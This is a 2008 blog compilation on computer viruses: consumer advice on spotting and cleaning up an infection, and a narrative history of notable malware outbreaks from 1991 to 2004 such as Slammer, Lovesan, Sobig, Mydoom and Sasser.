Largest Online VIRUSOPEDIA

Once you Are attacked by a Virus Hub

2008-06-07T10:08:00.001-07:00

What to Do If Your Computer Is Infected
Sometimes even an experienced user will not realise that a computer is infected with a virus. This is because viruses can hide among regular files, or camoflage themselves as standard files. This section contains a detailed discussion of the symptoms of virus infection, how to recover data after a virus attack and how to prevent data from being corrupted by malware.

Symptoms of infection
There are a number of symptoms which indicate that your computer has been infected. If you notice "strange things" happening to your computer, namely:

unexpected messages or images are suddenly displayed
unusual sounds or music played at random
your CD-ROM drive mysteriously opens and closes
programs suddenly start on your computer
you receive notification from your firewall that some applications have attempted to connect to the Internet, although you did not initiate this, then it is very likely that your computer has been infected by a virus
Additionally, there are some typical symptoms which indicate that your computer has been infected via email:

your friends mention that they have received messages from your address which you know you did not send
your mailbox contains a lot of messages without a sender's e-mail address or message header
These problems, however, may not be caused by viruses. For example, infected messages that are supposedly coming from your address can actually be sent from a different computer.

There is a range of secondary symptoms which indicate that your computer may be infected:

your computer freezes frequently or encounters errors
your computer slows down when programs are started
the operating system is unable to load
files and folders have been deleted or their content has changed
your hard drive is accessed too often (the light on your main unit flashes rapidly)
Microsoft Internet Explorer freezes or functions erratically e.g. you cannot close the application window
90% of the time the symptoms listed above indicate a hardware or software problem. Although such symptoms are unlikely to be caused by a virus, you should use your antivirus software to scan your computer fully.

What you should do if you notice symptoms of infection
If you notice that your computer is functioning erratically

Don't panic! This golden rule may prevent the loss of important data stored in your computer and help you avoid unnecessary stress.
Disconnect your computer from the Internet.
If your computer is connected to a Local Area Network, disconnect it.
If the computer cannot boot from the hard drive (error at startup), try to start the system in Safe Mode or from the Windows boot disk
Before taking any action, back up all critical data to an external drive (a floppy disk, CD, flash memory, etc.).
Install antivirus software if you do not have it installed.
Download the latest updates for your antivirus database. If possible, do not use the infected computer to download updates, but use a friend's computer, or a computer at your office, an Internet cafe, etc. This is important because if you are connected to the Internet, a virus can send important information to third parties or may try to send itself to all email addresses in your address book. You may also be able to obtain updates for your antivirus software on CD-ROM from the software vendors or authorized dealers.
Perform a full system scan.
If no viruses are found during a scan
If no viruses are found during the scan and the symptoms that alarmed you are classifed, you probably have no reason to worry. Check all hardware and software installed in your computer. Download Windows patches using Windows Update. Deinstall all unlicensed software from your computer and clean your hard drives of any junk files.

If viruses are found during a scan
A good antivirus solution will notify you if viruses are found during a scan, and offer several options for dealing with infected objects.

In the vast majority of cases, personal computers are infected by worms, Trojan programs, or viruses. In most cases, lost data can be successfully recovered.

A good antivirus solution will provide the option to disinfect for infected objects, quarantine possibly infected objects and delete worms and Trojans. A report will provide the names of the malicious software discovered on your computer.
In some cases, you may need a special utility to recover data that have been corrupted. Visit your antivirus software vendor's site, and search for information about the virus, Trojan or worm which has infected your computer. Download any special utilities if these are available.
If your computer has been infected by viruses that exploit Microsoft Outlook Express vulnerabilities, you can fully clean your computer by disinfecting all infected objects, and then scanning and disinfecting the mail client's databases. This ensures that the malicious programs cannot be reactivated when messages which were infected prior to scanning are re-opened. You should also download and install security patches for Microsoft Outlook Express.
Unfortunately, some viruses cannot be removed from infected objects. Some of these viruses may corrupt information on your computer when infecting, and it may not be possible to restore this information. If a virus cannot be removed from a file, the file should be deleted.
If your computer has suffered a severe virus attack
Some viruses and Trojans can cause severe damage to your computer:

If you cannot boot from your hard drive (error at startup), try to boot from the Windows rescue disk. If the system can not recognize your hard drive, the virus has damaged the disk partition table. In this case, try to recover the partition table using scandisk, a standard Windows program. If this does not help, contact a computer data recovery service. Your computer vendor should be able to provide contact details for such services.
If you have a disk management utility installed, some of your logical drives may be unavailable when you boot from the rescue disk. In this case, you should disinfect all accessible drives, reboot from the system hard drive and disinfect the remaining logical drives.

Recover corrupted files and applications using backup copies after you have scanned the drive containing this data.
Diagnosing the problem using standard Windows tools
Although this is not recommended unless you are an experience user, you may wish to:

check the integrity of the file system on your hard drive (using CHKDSK program) and repair file system errors. If there are a large number of errors, you must backup the most important files to removable storage media before fixing the errors
scan your computer after booting from the Windows rescue disk
use other standard Windows tools, for example, the scandisk utility
For more details on using these utilities, refer to the Windows Help topics.

If nothing helps
If the symptoms described above persist even after you have scanned your computer, and checked all installed hardware and software and your hard drive using Windows utilities, you should send a message with a full description of the problem to your antivirus vendor's technical support department.

Some antivirus software developers will analyse infected files submitted by users.

After you have eradicated the infection
Once you have eradicated the infection, scan all disks and removable storage media that may be infected by the virus.

Make sure that you have appropriately configured antivirus software installed on your computer.

Practice safe computing.

All of these measures will help prevent your computer getting infected in the future.

The Venture Capital Win 32 ViroHistory

2008-06-07T10:00:00.000-07:00

History of 4th Decade In Virus History

2001
2001 was a mixed bag: antivirus vendors took significant strides forward, but the number of virus attacks rose nevertheless. The changeover from classic viruses to worms continued as Internet use exploded. Virus writers demonstrated a definite preference for malicious code that propagated by sending their files across local networks and the Internet.

Significant outbreaks
Malicious programs that exploited vulnerabilities in applications and operating systems caused serious epidemics in 2001: CodeRed, Nimda, Aliz and BadtransII. The large-scale epidemics caused by these worms changed the face of computer security and set trends for malware evolution for several years to come.

Endless variants of LoveLetter (aka ILoveYou), Magistr and SirCam also enlivened the malware landscape, keeping users and antivirus vendors on their toes.

Vulnerablities
A vulnerability is a hole in a legitimate application or operating system that can be exploited by a virus writer: malicious code penetrates the system via such loopholes.

Viruses and worms that exploit vulnerabilities are particularly dangerous in that they are installed and activated automatically regardless of user action. For instance, Nimda penetrated computers even when the infected email was simply viewed through the preview window in MS Outlook. CodeRed went a step further: it scanned the Internet for vulnerable machines and infected them. According to Kaspersky Virus Lab statistics, malware exploiting vulnerabilities made up almost 55% of all malware detected in 2001.

The interest displayed by virus writers in vulnerabilities was justified. Traditional infection techniques used by classic file viruses, where the user initiated the infection cycle, were no longer as effective as previously. Therefore, virus writers eagerly adopted the new technique.

Email and the Internet - primary sources of new threats
Kaspersky Virus Lab statistics showed that virus attacks via email rose by 5% in 2001 in comparison with 2000 and made up almost 90% of the total number of virus incidents in 2001.

2001 proved to be a watershed in the evolution of virus attacks via the Internet. Previously, most Internet-related infections occurred when users downloaded and executed files from untrustworthy web sites. In 2001 a new infection technique appeared: users no longer needed to download files - a visit to an infected web site was enough. Virus writers substituted infected pages for clean ones. Most users were infected by malware that exploited vulnerabilities in MS IE. In some cases compromised sites offered free programs that turned out to be malicious.

Attacks via non-Internet technologies
2001 was also the year that instant messaging services, such as ICQ and MS Instant Messenger, were first used as channels for spreading malicious code. A spate of worm infections turned these services into further traps for unwary users. The Internet worm Mandragore attacked the Gnutella file-sharing network. And last but not least, 2001 saw a proliferation of worms designed to propagate via IRC channels.

More attacks on Linux
A significant number of malicious programs targeting Linux appeared in 2001. Ramen opened the season on January 19 and penetrated a large number of corporate networks within days. Victims included NASA (USA), A&M University (USA) and hardware vendor Supermicro (Taiwan).

The attacks swelled into an avalanche with Ramen clones and new Linux worms appearing one after another. Most of these malicious programs exploited vulnerabilities in the operating system. The rapid spread of these threats underlined the lack of preparation by Linux developers, who had been sleeping peacefully, sure that Linux was a completely secure environment. Many Linux users hadn't even bothered to install the patches that were available for some of the exploited vulnerabilities and fell easy prey for these worms.

Fileless worms - a new challenge
So-called fileless worms turned out to be one of the nastiest surprises of 2001. These worms were able to self-replicate and function on infected machines without using files. These worms exist only in RAM and spread as specially configured data packets.

This new technique gave antivirus experts some difficult moments. Traditional antivirus scanners and monitors proved helpless against this new threat, since up to that time antivirus engines had detected malicious programs during file operations. Kaspersky Lab was the first to develop a new antivirus filter that scanned incoming data packets in background mode and deleted fileless worms.

Worms for Windows increase
While classic viruses, (predominantly macro and script viruses) visibly dominated throughout 1999-2000, 2001 was the year of worms for Windows. By the fall, these worms had caused about 90% of all registered virus infections.

The reasons for this trend were two-fold: on the one hand new technologies allowed virus writers to create better worms, and on the other, antivirus vendors had developed effective protection against macro and script viruses.

Virus hoaxes
Virus hoaxes were all the rage in 2001, with 10 new warnings about a dangerous new virus registered by March. And nervous users, frightened by the large-scale outbreaks in 2000 scrambled to forward these warnings to friends and relatives. California IBM and Girl Thing proved especially effective. A letter warning users about a new ILoveYou outbreak scheduled for Valentine's day was also extremely effective.

Some of these hoaxes were so effective that copies of the messages were still circulating around the Internet several years later.

2001 in review:
Email and the Internet move to the fore environments for new threats;
Alternate channels such as ICQ, IRC, MSN Messenger and file-sharing networks also gain prominence;
Fileless worms appear on the scene;
Worms for Windows make up the majority of new threats by mid-year, with macro- and script-viruses losing ground significantly.

2002
There were 12 significant and 34 less serious virus outbreaks in 2002, along with continuing activity caused by viruses from previous years. Virus writers actively penetrated new platforms, applications and technologies.

2002 Highlights
Two new flash worms, LFM and Donut, appeared in January: both of these worms were designed to spread in the .NET environment. Fortunately, both worms turned out to be only proof of concept viruses and no infections were registered.

In May, we saw Spida, a worm that attacked SQL servers and Benjamin, a virus that triggered a whole series of copycat malware targeted at the Kazaa file-sharing network.

Malware for Linux
The worm Slapper finally convinced all remaining skeptics that Linux users need to be just as aware of security issues as users of all other operating systems. Slapper penetrated thousands of machines running Linux within a few days. Users of FreeBSD also got a timely reminder about security: a new worm called Scalper struck FreeBSD machines in September, though the damage did not escalate to the proportions caused by Slapper.

Professional virus writers
This was the year professional writers got down to business: there was a significant increase in malicious programs designed to commit financial fraud. These programs stole passwords, confidential data, Internet access information and other data that allowed virus writers to make money by using the harvested data.

Worms
Email worms, such as Klez and Lentin had already been popular prior to 2002. However, a new breed of email worms superseded the older versions: these new email worms spread by connecting directly to built-in SMTP servers on infected machines.

This development grew out of increased security measures which prevented worms from spreading via MS Outlook and other email clients. Email system developers integrated either antivirus protection or special functionality preventing unauthorized mailings. As a result, virus writers focused on worms that were able to avoid these measures.

Worms multiplying in other environments, such as LANs, P2P, IRC and so forth, disappeared almost entirely in this year.

Klez
An Internet worm named Klez caused the most serious outbreak of the year. Klez was first detected on 26 October and remained on the list of the most widespread malicious programs for the next two years. This is a record in virusology that is yet to be broken. New Klez variants, Klez.e and Klez.h were the most active Klez clones. Altogether, by the end of 2002, 6 out of 10 registered infections were caused by Klez.

Though Klez caused the most serious outbreak during 2002, several other worms provided some stiff competition: Lentin and Tanatos (aka Bugbear). In fact, Lentin surpassed Klez in the number of incidents by the end of the year.

Vulnerabilities
The trend to exploit vulnerabilities that first became significant in 2001 continued: virus writers homed in on the IFRAME vulnerability in MS Internet Explorer to create worms including Klez, Lentin and Tanatos. Altogether, 85% of all virus incidents.

Classic viruses
Interestingly enough, macro viruses rose to the fore among classic viruses this year. Macro viruses for MS Word - Thus, TheSecond, Marker and Flop were the most widespread. These viruses had first appeared in the late 1990s, but they resurfaced in 2002. The most likely reason is increased numbers of Windows users who were all sure that macro viruses were a thing of the past. Inconvenient security measures were abandoned and the result was a second round of old viruses. The majority of infections were caused by Elkern, CIH, FunLove and Spaces.

On the plus side, script viruses and other classic viruses almost disappeared in 2002.

Virus hoaxes
The upsurge in virus hoaxes that began in 2001 continued into 2002. Users worldwide flooded each other with new and old hoaxes: JDBGNR, Ace-?, SULFNBK, Virtual Card for You, California IBM and Girl Thing.

2002 summary
By the end of the year, an interesting pattern emerged in the spread of malicious programs. In previous years, the overwhelming majority of virus incidents were connected to a small number of viruses, typically 2-3. By September 2002, however, this pattern was broken: more and more infections were caused by viruses which did not make it to the top twenty.

Increased end user awareness regarding security issues and willingness to adopt precautionary methods undoubtedly played a role in this development. Correct protective techniques implemented by end users led to a decrease in number of incidents caused by individual viruses.

And yet, the overall number of infections did not decrease, meaning that the overall number of malicious programs in the wild had grown. Even though no single virus caused a significant outbreak, together they constituted an impressive volume.

2003
In 2003 two global Internet attacks took place that could be called the biggest in the history of the Internet. The Internet worm Slammer laid the foundation for the attacks, and used a vulnerability in the MS SQL Server to spread. Slammer was the first classic fileless worm, which fully illustrated the capabilities of a flash-worm - capabilities which had been foreseen several years before.

On January 25th, 2003, within the space of a few minutes, the worm infected hundreds of thousands of computers throughout the world, and increased network traffic to the point where several national segments of the Internet crashed. Experts estimate that traffic increased from 40% - 80% in a variety of networks. The worm attacked computers through ports 1433 and 1434 and on penetrating machines did not copy itself on any disk, but simply remained in computer memory. If we analyse the dynamics of the epidemic, we can assert that the worm originated in the Far East.

The second, more important epidemic was caused by the Lovesan worm, which appeared in August 2003. The worm demonstrated just how vulnerable Windows is. Just as Slammer did, Lovesan exploited a vulnerability in Windows in order to replicate itself. The difference was that Lovesan used a loophole in the RPC DCOM service working under Windows 2000/XP. This led to almost every Internet user being attacked by the worm.

As for viruses penetrating new platforms and applications, the year was surprisingly quiet. The only news was the discovery, in the wild, of MBP.Kynel, by Kaspersky Labs. This virus infects MapInfo documents and is written in MapBasic. The MBP.Kynel virus was undoubtedly written by a Russian.

2003 was the year of ceaseless epidemics caused by email worms. Ganda and Avron were first detected in January. The former was written in Sweden and is still one of the most widespread email worms in Scandinavia despite the fact that the Swedish police arrested the autour of the worm at the end of March.

Avron was the first worm to be created in the former USSR capable of causing a significant worldwide epidemic. The source code for the worm was published on the Internet and this has led to the appearance of a number of less effective versions.

Another important event in 2003 was the appearance of the first Sobig worm in January. Worms from this family all caused significant virus outbreaks but it was version 'f' which broke all records, becoming the most widely distributed worm in network traffic in Internet history. At the peak of the epidemic, Sobig.f, which was first detected in August, could be found in every 20th email message. The virus writers who created the Sobig family, were aiming to create a network of infected machines with the aim of conducting DoS attacks on arbitrarily selected sites and also to use the network for spam attacks.

The Tanatos.b email worm was also a notable event in virusology. The first version of Tanatos was written in the middle of 2002, but version 'b' appeared only a year later. The worm exploited the well-known IFRAME loophole in MS Outlook to automatically launch itself from infected messages. Tanatos caused one of the most significant email epidemics of 2003, coming second to that caused by Sobig.f, which probably has the record for the most machines infected by an email worm.

Worms from the Lentin family continued to appear. All these worms were written in India by a local hacker group as part of the 'virtual war' between Indian and Pakistani hackers. The most widespread versions were 'm' and 'o', where the virus replicated in the form of a ZIP archive file attached to infected messages.

Russian writers remained active; the second worm from the former USSR, which also caused a global epidemic was Mimail. The worm used the latest vulnerability in Internet Explorer to activate itself. The vulnerability allowed binary code to be extracted from HTML files and executed. This was first used in Russia in May 2003 (Trojan.Win32.StartPage.l) Following this, the vulnerability was used by the Mimail family and several other Trojan programs. The authors of the Mimail worm published the source code on the Internet, which led to the appearance of several new varieties of the worm in November 2003, written by other virus writers.

September was the month of Swen. I-Worm.Swen, masquerading as a patch from Microsoft, managed to infect several hundred thousand computers throughout the world and to date remains one of the most widespread email worms. The author of the virus exploited frightened users who were still nervous after the recent Lovesan and Sobig.f epidemics.

A recent significant epidemic was caused by Sober, a relatively simple mail worm written by a German, it is an imitation of the year's leader, Sobig.f.

In 2002, the trend was towards an increase in the number of backdoor and spy Trojan programs and this continued in 2003. In this category, Backdoor.Agobot and Afcore were most notable. There are now more than 40 varieties of Agobot in existence, since the author of the original version created a network of websites and IRC channels where anyone who wanted could, for a fee starting from $150, become the owner of an 'exclusive' version of Backdoor-a, which would be created in accordance with the client's wishes.

Afcore is slightly less widespread. However, in order to mask its presence in the system, it uses an unusual method; it places itself in additional file systems of the NTFS systems, i.e. in the catalogue stream, not the file streams.

A new and potentially dangerous trend was identified at the end of 2003; a new type of Trojan, TrojanProxy. This was the first and clearest sign of virus writers and spammers uniting. Spammers began using machines infected by such Trojan programs for mass spammer attacks. It is also clear that spammers participated in a number of epidemics as malicious programs were spread using spamming technology.

Internet worms constituted the second most active class of viruses in 2003; specifically I-Worms which replicated by seizing passwords to remote network resources. As a rule, such worms are based on IRC clients, and scan the addresses of IRC users. They then attempt to penetrate computers using the NetBIOS protocol and port 445. One of the most notable viruses in this class was the Randon family of Internet worms.

Throughout the year Internet worms remained the dominant type of malicious software.

Viruses, namely macro viruses such as Macro.Word97.Saver came in second. However, Trojan programs overtook viruses in the autumn, and this trend continues through today.

Where We've Been and Where We're Going
Worms - trendsetting in 2003
The trends in virusology that we observe today have their primary roots in the second half of 2003. Internet worms Lovesan, Sobig, Swen and Sober all not only caused global epidemics, but alos profoundly changed the malware landscape. Each of these malicious programs set new standards for virus writers.

Once a piece of malware which uses fundamentally new techniques to propagate or infect victim machines appears, virus writers are quick to adopt the new approach. Today's new threats all incorporate characteristics of Lovesan, Sobig, Swen or Sober. Therefore, in order to understand what virus writers are doing currently, and to predict what the future may bring, we need to examine this quartet of worms carefully.

Lovesan
Lovesan appeared in August 2003 and infected millions of computers worldwide in just a few days. This Internet worm propagated by exploiting a critical vulnerability in MS Windows. Lovesan spread directly via the Internet, moving from computer to computer, ignoring methods such as IRC, P2P and email, which were popular at the time. The Morris worm first used this propagation method in 1988, but it took 15 years for another virus writer to take advantage of this particular technique.

To some extent, Lovesan was a copycat worm; by exploiting an MS Windows vulnerability, it followed in Slammer's footsteps. However, although Slammer, which struck in January 2003, infected approximately half a million computers, it did not achieve the same infection rates as Lovesan.

Slammer was also the first classic file-less worm - certainly an achievement, in a perverse way for the coder, since writing a viable file-less worm requires strong programming skills. As a matter of fact, there has only been one other moderately 'successful' file-less worm since Slammer - Witty, which made its appearance in March 2004.

Lovesan also started another trend - the inclusion of DoS attacks on corporate sites part of the worm's payload. Lovesan attacked Microsoft and had the attack been successful, millions of users worldwide would have been unable to download the patches they needed to protect their machines from the worm. Fortunately, the DoS attack failed, but Microsoft did re-engineer their web server architecture in response.

To summarize, Lovesan set the following trends:

Exploiting critical vulnerabilities in MS Windows
Propagation via the Internet through direct connections to victim machines
Organising DoS and DDos attacks on key websites
Sobig.f
Sobig.f followed hard on the heels of Lovesan in August 2003 and created the first serious email worm outbreak of the twenty-first century. At the height of the epidemic one out of 10 email messages was infected by Sobig. Email traffic increased ten fold and included millions of messages from antivirus programs faithfully informing spoofed senders about the detected and deleted malware.

Sobig.f did not exploit any vulnerabilities and the messages attributes (message subject etc.) were also nothing out of the ordinary. However, Sobig's payload included a backdoor function that left antivirus professionals waiting with bated breath for August 22 - the date when all Sobig controlled zombies were scheduled to receive a mystery command. Fortunately, the server where the command was to be launched was shut down on time, but Sobig.f continues to plague the Internet community, remaining among one of the most common viruses worldwide.

Large-scale epidemics are not caused by classic worms released into the wild from a few computers. These classic worms often take weeks or even months to reach a peak of activity. Sobig.f was no exception to this rule: it exploited machines infected previously by prior versions. Sobig.a appeared in January 2003 and was followed by several modifications, all of which conscientiously built a network of infected machines, machine by machine. Once critical mass was reached Sobig.f struck.

Sobig.f initiated the wave of large-scale email worm outbreaks seen in 2004, and this wave will continue to break until some new technique is invented! Sobig brought two innovative techniques to the world of malware:

The creation of networks of infected machines to serve as epidemic platforms
Mass mailing of malware using spammer techniques
Swen
Let's move on in time to September 18, 2003. Early in the morning, Kaspersky Lab received a sample from New Zealand. The worm looked interesting, but nobody anticipated an epidemic. However, 6 hours later cries for help from infected users worldwide proved that a new and dangerous virus has joined the fray.

At first glance, Swen seemed to be yet another worm using standard propagation methods - email, IRC and P2P networks. However, Swen stood out from the crowd for its stunningly successful social engineering. The worm arrived disguised as a patch from Microsoft which would supposedly secure all vulnerabilities. The message included Microsoft logos, links to real Microsoft resources and a very convincing text. Recipients, scared by the recent publicity about the Lovesan and Sobig outbreaks, and having absorbed the lesson that patching is essential, obediently clicked on the link. The email was so convincing that many experienced users were caught out, joining droves of less informed users in launching the worm.

The resulting outbreak was certainly less serious than the ones caused by Lovesan and Sobig (only 350 infected servers were used to spread Swen), however, Swen did prove that social engineering works, and works very well indeed when properly implemented.

Sober
Sober is the final entrant in the list of interesting worms from 2003. Sober is a Sobig copycat, but had some innovative features. Infected emails came in many languages, with the language chosen being determined by the recipient's IP address of the recipient. Sober also exploited social engineering techniques by pretending to be a removal tool for Sobig.

2004
2004 has so far given us many new and original malicious programs. Some of these incorporate last year's developments, but many new features and proof of concept viruses demonstrate that the computer underground is still thriving and continuing to evolve.

January 2004
A new Trojan proxy, Mitglieder, appeared in the first week of the new year. Thousands of ICQ users received a message inviting them to visit a specified site. Users who clicked on the link then turned to antivirus vendors for help. The site contained a Trojan that used a vulnerability in MS IE to install and launch a proxy server on the victim machine without the user's knowledge. The proxy opened a port making it possible for a remote user to send and receive email using the infected machine. Victim machines were transformed into zombies spewing out spam. Virus writers quickly adopted the two new techniques introduced in Mitglieder:

Mass mailings of links to infected sites via email or ICQ
Trojan proxies become a separate class of malware closely linked to spammers
Last but not least, Mitglieder also created a network of zombie machines - but the world only found out about this when Bagle struck.

Bagle seems to have been written by the same group which authored Mitglieder. Bagle also either installed a Trojan proxy server or downloaded it from the Internet. In any case, the worm was simply an improved version of Mitglieder, with the ability to propagate by email. Moreover, Bagle was sent from machines infected by Mitglieder.

And finally, the most serious virus epidemic in computer history to date: the worm Mydoom.a. It propagated using a network of zombie machines infected in advance (like Sobig), a clever bit of social engineering (like Swen), incorporated an effective backdoor function and was programmed to conduct a DoS attack on a corporate site (like Lovesan).

This concatenation of features copied from three highly viable worms broke all records. Mydoom.a created more email traffic than the recent leader Sobig.f; infected millions of machines worldwide, opening ports to external access and effectively crashing the SCO website.

Mydoom.a did more than build on the success of its predecessors in creating the most severe epidemic in computer virology to date. The worm introduced a new technique as well. The backdoor installed by Mydoom was exploited by other malware authors, with new viruses that searched for the Mydoom backdoor component appearing immediately. Most of these newcomers penetrated machines via the backdoor, deleted Mydoom and installed themselves in place of Mydoom. Some of these copycats caused local outbreaks and they all forced local segments of the Mydoom zombie network to work for the copycat virus writers instead.

Thus, we saw yet another technique gain popularity:

Using vulnerabilities or holes created by other viruses
February 2004
NetSky.b
This email worm used the network of infected machines left in the wake of Backdoor.Agobot to spread. NetSky.b demonstrated most of the techniques listed above but also deleted a number of worms: Mydoom, Bagle and Mimail. The idea of a so-called 'antivirus' virus is not new. The first significant example of this supposedly helpful species, Welchia, appeared in 2003. Welchia not only penetrated computers to clean machines infected by Lovesan, it also attempted to download the Windows patch that closed the vulnerability exploited by Lovesan in the first place.

NetSky not only deleted competitor viruses, but engaged their authors in a war of word, coding insults into the body of the virus. The writer of Mydoom did not take up the challenge, but the authors of Bagle picked up the gauntlet and the virus war began. At the peak of activity, three versions of each worm appeared in the space of one day.

Setting aside the issue of verbal warfare, the authors of Bagle and NetSky introduced several innovations:

Active deletion of competitor viruses
Propagation in archived files (Bagle & NetSky variants)
Propagation in password-protected compressed files: passwords were either included as text strings or as graphics (Bagle)
Abandoning propagation by email: instead, the malicious programs spread by directing infected machines to sites where the worm's body was downloaded or downloading the worm's body from previously infected machines (NetSky)
The incidents listed above have not only had a serious influence on virus writers, but also on the evolution of the architecture and functionality of contemporary antivirus solutions.

The move to abandon emailing the body of the worm is particularly significant. NetSky.q, a NetSky variant that spread by sending emails with links to previously infected machines, was immediately followed by Bizex. Bizex was the first ICQ worm; it penetrated machines via ICQ and sent all ICQ contacts found on newly infected machines links to a site where the body of the worm was located. Once users clicked on the link, the body of the worm would be downloaded from the infected web site and the cycle started again. Bizex successfully combined characteristics of Mitglieder (propagation via ICQ) and NetSky (sending links to infected web sites).

March - May 2004
Snapper and Wallon
These Internet worms consolidated the techniques introduced by NetSky and Bizex. Both worms scanned email address books on infected machines and sent links to infected sites to all contacts in the local address books. Virus writers placed script Trojans on infected sites: these Trojans then exploited vulnerabilities in Internet Explorer to install the main components on victim machines.

Even today, emails containing links are not treated by recipients with the appropriate caution. The user who is suspicious of emails with attachments will nevertheless cheerfully click on links supposedly sent by friends. Undoubtedly, this technique will continue to be used until users learn to treat links sent via email with the same wariness that they display towards email attachments. It seems likely that the continual discovery of new vulnerabilities in Internet Explorer and Outlook will only add fuel to the fire.

Sasser
The final ground-breaking virus of 2004 to date was Sasser, which appeared in late April. This Internet worm exploited a critical vulnerability in MS Windows, and spread in a similar way to Lovesan, connecting directly to the victim machine via the Internet. Sasser caused a serious outbreak in Europe and left behind an FTP-server vulnerability that was immediately picked up by Dabber and Cycle. When Sven Jaschan, the teenage author of Sasser, was arrested, he admitted to also being the author of the NetSky family.

The arrest of a virus writer so soon after the release of a new malicious program made history.

Sasser was evidence that virus writers recycle and plagiarize successful techniques: Jaschan used techniques exploited by Lovesan, and other virus writers in turn immediately picked up on his ideas.

Plexus
Plexus made history by becoming the first worm since Nimbda (2001) to use all available propagation techniques: - the Internet, email, P2P networks and LANs. Three years had passed since any virus writer utilized so many resources simultaneously.

Plexus was potentially an extremely dangerous worm based on the Mydoom source code. Here the virus writer followed in the footsteps of Sober's author. Parts of Sober were pure plagiarism, resulting in a worm which was more successful than some of the malicious program 'donors'.

Fortunately, no version of Plexus caused a serious outbreaks, most likely because none of them used spammer mass mailing techniques for initial propagation. Nor did the author of these worms use any effective social engineering techniques. However, should they or somebody else choose to create new versions which correct these failings, the world may be at risk of a serious outbreak.

Beyond worms
The worms described above caused the most publicized outbreaks in recent IT history. However, other types of malware can pose a serious threat to computer and data security; it is therefore important to evaluate the total picture, including non-Windows environments, in in order to gain a complete picture of current trends.

Other Malware
Trojans
Trojans are often perceived as being less dangerous than worms, as they cannot replicate or travel independently. However, this is a misconception: most of today's malware combines several components, and many worms carry Trojans as part of their payload. These Trojans also lay the foundations for bot networks.

Trojans themselves are becoming more sophisticated. Trojan spy programs are proliferating, with dozens of new versions appearing every week. These versions are all slightly different, but developed with one aim in mind: to steal confidential financial information.

Some of these programs are simple key loggers, which send a record of keyboard activity to the author or user of the program. The more elaborate versions offer complete control over victim machines, sending data to remote servers and receiving and executing commands.

Total control over victim machines is often the goal for Trojan writers. Infected machines are usually joined in a bot network often using IRC channels or web sites where the coder puts new commands. The more complex Trojans, such as many Agobot variants, unites all infected machines into a single P2P network.

Once bot networks have been created, they are rented out to spammers or used to conduct DDoS attacks. The escalating commercialization of virus writing is leading to increased sophistication in bot network creation.

Trojan droppers and downloaders
Both droppers and downloaders have one goal: to install an additional piece of malware, be it a worm or another Trojan, on the victim machine. They differ from Trojans simply in the methods which they use.

Droppers either install another malicious program or a new version of previously installed malware. Droppers can carry several completely unrelated pieces of malware, which may display different behaviours and may even be written by different authors. In effect, droppers act as an archiver which can compress many different kinds of malware.

Droppers are often used to carry known Trojans. This is because it is significantly easier to write a dropper than a new Trojan, and to ensure that the dropper cannot be detected by antivirus solutions. Most droppers are written in VBS and JS, which accounts for their popularity; the languages themselves are relatively simple, with cross-platform application.

Virus writers often use downloaders in the same way as droppers. However, downloaders can be more useful than droppers. Firstly, downloaders are much smaller than droppers. Secondly, they can be used to download endless new versions of the targeted malware. Like droppers, downloaders are usually written in script languages such as VBS and JS, but they also often exploit Internet Explorer vulnerabilities.

Moreover, both droppers and downloaders are use not only to install other Trojans, but also other malicious programs such as adware and pornware.

Classic File Viruses
Classic file viruses reigned supreme in the 90s; however they have almost totally disappeared today. There are currently about 10 file viruses that are still active. They experience peaks of activity when they infect the executable files of worms: the file virus will then travel as far as the infected worm file. For instance, we often see samples of MyDoom, Netsky and Bagle that are infected by file viruses such as Funlove, Xorala, Parite or Spaces.

On the whole, there is very little danger that classic file viruses will cause any major epidemics. Even Rugrat, the first proof of concept virus for Win64, is unlikely to change the situation in the foreseeable future.

Other Environments
Linux
To date Linux-based platforms have mainly been the victims of rootkit attacks and simple file viruses. However, the growing number of publicized vulnerabilities means that the increased number of users switching to Linux will not remain untouched by new malware.

Handhelds
PDAs are now almost household appliances. Virus writers have not been slow to take advantage of their growing popularity. the first Trojan for Palm OS appeared in September 2000. The first proof of concept virus for Pocket PC, Duts, was slower to arrive, finally appearing in July 2004. So far there have not been any serious virus outbreaks in the world of handhelds, but it is only a question of time. Once virus writers decided that information saved on handhelds is worth accessing, malware for these devices will undoubtedly evolve rapidly.

Mobile Phones
Mobile phones have come a long way, and are now both complex and widely used. These two factors are bound to attract the attention of virus writers, particularly with the advent of smart phones, which effectively have computer functionality. The first proof of concept virus for smartphones running Symbian OS appeared in June 2004. The only missing factor is commercial use - once virus writers identify a way to make money by exploiting cell phones, viruses will inevitably appear.

The Third decade of Malware History

2008-06-07T09:56:00.000-07:00

1991-1992
1991
The computer virus population continues to grow, reaching the 300 mark. As the number and severity of virus incidents escalated, the need for reliable security rose proportionally. Early 1991 saw the appearance of more AV products: Norton AntiVirus from Peter Norton who now believed in viruses; Central Point Antivirus; Untouchable from Fifth Generation System. The latter were bought out by Symantec in 1993 and 1994.

Other virus writer bulletin boards modeled after the VX BBS and new personalities emerged from the computer underground: Cracker Jack (Italy - the Italian research Laboratory BBS), Gonorrhea (Germany); Demoralized Youth (Switzerland), Hellpit (USA) and Dead on Arrival and Semaj (UK). The computer underground was forming.

Tequila, a polymorphic boot infector, caused a significant epidemic in April of this year. It was created by a Swiss programmer exclusively for research purposes and without malicious intent. However, one copy of the virus was stolen by an acquaintance who consciously infected other users.

The summer of 1991 saw a virus epidemic with Dir_II using a fundamentally new means of infecting files: link-technology. This virus, to this day, remains the only example of this type detected in the wild.

Altogether, 1991 was relatively calm; a calm before the storm that broke in 1992.

1992
Viruses for non IBM-compatible and non MS-DOS systems fade from the foreground at this time. Loopholes in global networks were closed, errors corrected, and network worms lost the conditions they required to spread - at least for the time being!

Instead, boot sector viruses were gaining popularity on the more commonly used operating systems (MS-DOS) on the most widely used platforms (IBM-PC). The number of viruses grew astronomically and security incidents occurred almost every day. New antivirus programs continued to appears as did several books and a number of regular publications dedicated to viruses. This was the background for some important developments in virus writing.

In the beginning of 1992 the first polymorphic generator, MTE appeared. Its primary purpose is to integrate with other viruses to facilitate their polymorphism. The author of this program, the infamous Dark Avenger, did everything possible to ease the work of his colleagues in this area. The MTE generator was delivered in the form of a ready to use module and was accompanied by documentation.

Due to MTE, several polymorphic viruses immediately appeared. MTE was also the forerunner of several other polymorphic generators, creating a headache for many antivirus companies. Even after months of work, many antivirus companies were unable to reach 100% results in detecting well-known versions of polymorphic viruses created with the help of MTE.

